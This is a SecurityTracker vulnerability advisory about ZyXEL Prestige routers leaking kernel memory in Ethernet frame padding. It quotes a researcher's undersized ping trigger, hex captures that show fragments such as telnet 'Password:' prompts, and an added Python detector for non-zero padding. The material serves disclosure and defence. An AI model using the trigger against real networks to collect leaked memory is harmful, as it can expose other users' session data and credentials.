SecurityTracker.com
Category:   Device (Router/Bridge/Hub)  >   Prestige Router (ZyXEL)
Vendors:   ZyXEL Communications Corp.
ZyXEL Prestige Router Discloses Portions of Memory Contents to Remote Users
SecurityTracker Alert ID:  1008999
SecurityTracker URL:  http://securitytracker.com/id/1008999
CVE Reference:   CAN-2003-0001
Updated:  Sep 14 2004
Original Entry Date:  Feb 10 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): ZyNOS F/W Version: V3.40(ES.5), 2/10/2003
Description:   An information disclosure vulnerability was reported in the ZyXEL Prestige ADSL router. A remote user can view portions of kernel memory.

@Stake originally reported that several Ethernet Network Interface Card (NIC) device drivers do not properly perform frame padding and may include portions of previously transmitted packets or kernel memory within padded Ethernet packets.

A remote user on the same Ethernet subnet can send packets to the target system and may be able to view portions of the target system's kernel memory (or of previously transmitted information) in the reply packets.

In this report, DiSToAGe has indicated that ZyXEL routers are also affected. A remote user on the LAN-side interface can reportedly send an ICMP packet or a TCP packet to the target device and can then monitor portions of the device's memory in the resulting response.

The author indicated that it was unknown whether this flaw affects the ADSL side.

The vendor has reportedly been notified without response.

In September 2004, Przemyslaw Frasunek reported that the ZyXEL P681 (ZyNOS S/W Version: Vt020225a | 2/25/2002) discloses portions of memory in ARP requests.

Impact:   A remote user on the local Ethernet may be able to view portions of previously transmitted packets or kernel memory.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.zyxel.com/
Cause:   Access control error, State error
Underlying OS:  

Message History:   None.


 Source Message Contents

Date:  Sat, 07 Feb 2004 13:42:05 +0100
Subject:  [Fwd: zyxel prestige ethernet information leakage]


I sent a mail to the vendor, without response, so here it is.

In the example here you can see information about the telnet interface
previously connected to.

Note the problem does not only exist with ICMP packets but seems to be in
ACK packets on TCP too. I don't know if the problem exists only on the LAN
side or if the bad padding is added on the ADSL side too, so
information can be seen by remote hosts.

I don't know if other models are vulnerable too.

> 
> Hi,
> 
> Some Ethernet interfaces have security problems: information leakage,
> please see CERT vulnerability #412115
> 
> http://www.kb.cert.org/vuls/id/412115
> 
> It says that ZyXEL devices with ZyNOS v.2.50 to v.3.60 are not vulnerable
> but it isn't true.
> 
> Here you can see a report with a ZyXEL Prestige 650R-11 ADSL router.
> 
>                 Name: Router
>                 Routing: IP
>                 ZyNOS F/W Version: V3.40(ES.5) | 2/10/2003
>                 ADSL Chipset Vendor:  Alcatel, Version  3.9.122
>                 Standard: Multi-Mode
> 
> Send an ICMP packet with less data than normal so the remote interface pads
> with data to complete the frame:
> 
> ping -s 0 router
> 
> Here are the replies; you can see other portions of memory in the replies by
> the router:
> 
> 10:15:42.904088 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae1 0000 fe01 aeab c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17f2 e80c 0001 456e 7465        ............Ente
> 0x0020   721b 5b32 313b 3333 484d 656e 751b             r.[21;33HMenu.
> 10:15:43.918189 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae2 0000 fe01 aeaa c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17f1 e80c 0002 6377 437a        ............cwCz
> 0x0020   5010 03ff 434b 0000 27ff fc05 fffe             P...CK..'.....
> 10:15:44.928354 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae3 0000 fe01 aea9 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17f0 e80c 0003 6377 437a        ............cwCz
> 0x0020   5010 0400 434a 0000 0204 0200 c0a8             P...CJ........
> 10:15:45.938513 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae4 0000 fe01 aea8 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17ef e80c 0004 5061 7373        ............Pass
> 0x0020   776f 7264 3a20 0000 02ac 3c93 c0a8             word:.....<...
> 10:15:46.948675 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae5 0000 fe01 aea7 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17ee e80c 0005 6377 437c        ............cwC|
> 0x0020   5010 03fe 4349 0000 0204 0200 c0a8             P...CI........
> 10:15:47.958838 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae6 0000 fe01 aea6 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17ed e80c 0006 6377 437c        ............cwC|
> 0x0020   5010 0400 4347 0000 75dd 6642 c0a8             P...CG..u.fB..
> 
> 
> 
> 
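
A defender-side check for the condition visible in the capture above, as an added example that is not part of the original advisory or message: it parses `tcpdump -x` text, treats everything after the IPv4 total length as Ethernet frame padding, and flags padding that is not all zero. The function names are hypothetical, and the sample input is constructed from two of the echo replies quoted above.

```python
import re

# Constructed sample: two of the echo replies quoted in the advisory
# (tcpdump -x text, which starts at the IPv4 header, not the Ethernet header).
SAMPLE = """\
10:15:42.904088 router > station: icmp: echo reply
0x0000   4500 001c 8ae1 0000 fe01 aeab c0a8 0101        E...............
0x0010   c0a8 0102 0000 17f2 e80c 0001 456e 7465        ............Ente
0x0020   721b 5b32 313b 3333 484d 656e 751b             r.[21;33HMenu.
10:15:45.938513 router > station: icmp: echo reply
0x0000   4500 001c 8ae4 0000 fe01 aea8 c0a8 0101        E...............
0x0010   c0a8 0102 0000 17ef e80c 0004 5061 7373        ............Pass
0x0020   776f 7264 3a20 0000 02ac 3c93 c0a8             word:.....<...
"""

def parse_tcpdump_hex(text):
    """Return one bytes object per packet found in tcpdump -x style text."""
    packets = []
    for line in text.splitlines():
        line = line.lstrip("> ")                 # tolerate mail-quoted dumps
        if line.startswith("0x"):
            fields = re.split(r"\s{2,}", line)   # offset, hex words, ASCII
            if packets and len(fields) > 1:
                packets[-1] += bytes.fromhex(fields[1])
        elif line.strip():
            packets.append(b"")                  # summary line opens a packet
    return packets

def padding_of(packet):
    """Bytes captured after the end of the IPv4 datagram (frame padding)."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return b""                               # not IPv4, nothing to judge
    total_len = int.from_bytes(packet[2:4], "big")
    if total_len < 20:
        return b""                               # malformed header
    return packet[total_len:]                    # empty if capture truncated

def printable(data):
    return "".join(chr(b) if 32 <= b < 127 else "." for b in data)

def find_leaks(text):
    """List (packet index, padding length, printable padding) for non-zero
    padding. RFC 894 says short frames are padded with octets of zero."""
    findings = []
    for index, packet in enumerate(parse_tcpdump_hex(text)):
        pad = padding_of(packet)
        if any(pad):
            findings.append((index, len(pad), printable(pad)))
    return findings

if __name__ == "__main__":
    for finding in find_leaks(SAMPLE):
        print(finding)
```

Both sample replies declare a 28-byte datagram inside a 46-byte minimum Ethernet payload, so the 18 trailing bytes are the padding under test.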

 
 



Copyright 2013, SecurityGlobal.net LLC